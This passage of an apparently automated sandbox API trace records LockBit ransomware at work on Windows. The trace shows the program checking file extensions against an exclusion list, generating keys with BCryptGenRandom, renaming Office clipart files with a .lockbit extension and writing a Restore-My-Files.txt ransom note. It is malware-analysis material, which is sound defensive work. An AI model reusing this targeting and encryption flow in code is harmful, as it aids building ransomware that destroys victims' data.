(lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.218] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02088_.WMF") returned 1 [0116.219] lstrcmpiW (lpString1="ntldr", lpString2="FD02088_.WMF") returned 1 [0116.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02088_.WMF") returned 1 [0116.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02088_.WMF") returned -1 [0116.219] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02088_.WMF") returned -1 [0116.219] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02088_.WMF") returned 1 [0116.219] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02088_.WMF") returned 1 [0116.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0116.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF") returned=".WMF" [0116.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.219] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.219] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.220] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.220] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.lockbit") returned 72 [0116.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0116.221] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.221] malloc (_Size=0x40068) returned 0x3d70450 [0116.221] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3696) returned 1 [0116.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.221] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0116.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0116.222] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0116.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.247] malloc (_Size=0xa6) returned 0x77d7a8 [0116.247] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.248] free (_Block=0x77d7a8) [0116.248] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02088_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.248] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.248] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x61c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02097_.WMF", cAlternateFileName="")) returned 1 [0116.248] lstrcmpiW (lpString1=".", lpString2="FD02097_.WMF") returned -1 [0116.248] lstrcmpiW (lpString1="..", lpString2="FD02097_.WMF") returned -1 [0116.248] PathFindExtensionW (pszPath="FD02097_.WMF") returned=".WMF" [0116.248] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.248] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.249] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.249] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02097_.WMF") returned 1 [0116.250] lstrcmpiW (lpString1="ntldr", lpString2="FD02097_.WMF") returned 1 [0116.250] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02097_.WMF") returned 1 [0116.250] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02097_.WMF") returned -1 [0116.250] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02097_.WMF") returned -1 [0116.250] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02097_.WMF") returned 1 [0116.250] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02097_.WMF") returned 1 [0116.250] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0116.250] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF") returned=".WMF" [0116.250] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.250] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.250] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.251] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.251] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.lockbit") returned 72 [0116.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0116.252] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.252] malloc (_Size=0x40068) returned 0x1ff1e60 [0116.252] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1564) returned 1 [0116.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0116.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0116.253] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0116.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.319] malloc (_Size=0xa6) returned 0x77d7a8 [0116.319] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.320] free (_Block=0x77d7a8) [0116.320] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02097_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.320] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.320] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.320] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1234, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02115_.WMF", cAlternateFileName="")) returned 1 [0116.320] lstrcmpiW (lpString1=".", lpString2="FD02115_.WMF") returned -1 [0116.320] lstrcmpiW (lpString1="..", lpString2="FD02115_.WMF") returned -1 [0116.320] PathFindExtensionW (pszPath="FD02115_.WMF") returned=".WMF" [0116.321] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.321] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0116.322] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0116.322] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02115_.WMF") returned 1 [0116.322] lstrcmpiW (lpString1="ntldr", lpString2="FD02115_.WMF") returned 1 [0116.322] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02115_.WMF") returned 1 [0116.322] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02115_.WMF") returned -1 [0116.323] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02115_.WMF") returned -1 [0116.323] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02115_.WMF") returned 1 [0116.323] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02115_.WMF") returned 1 [0116.323] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0116.323] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned=".WMF" [0116.323] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0116.323] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0116.323] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0116.324] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0116.324] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0116.324] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0116.324] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0116.324] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0116.324] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0116.324] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF.lockbit") returned 72 [0116.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0116.329] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0116.329] malloc (_Size=0x40068) returned 0x3e70008 [0116.329] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4660) returned 1 [0116.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0116.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0116.330] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: 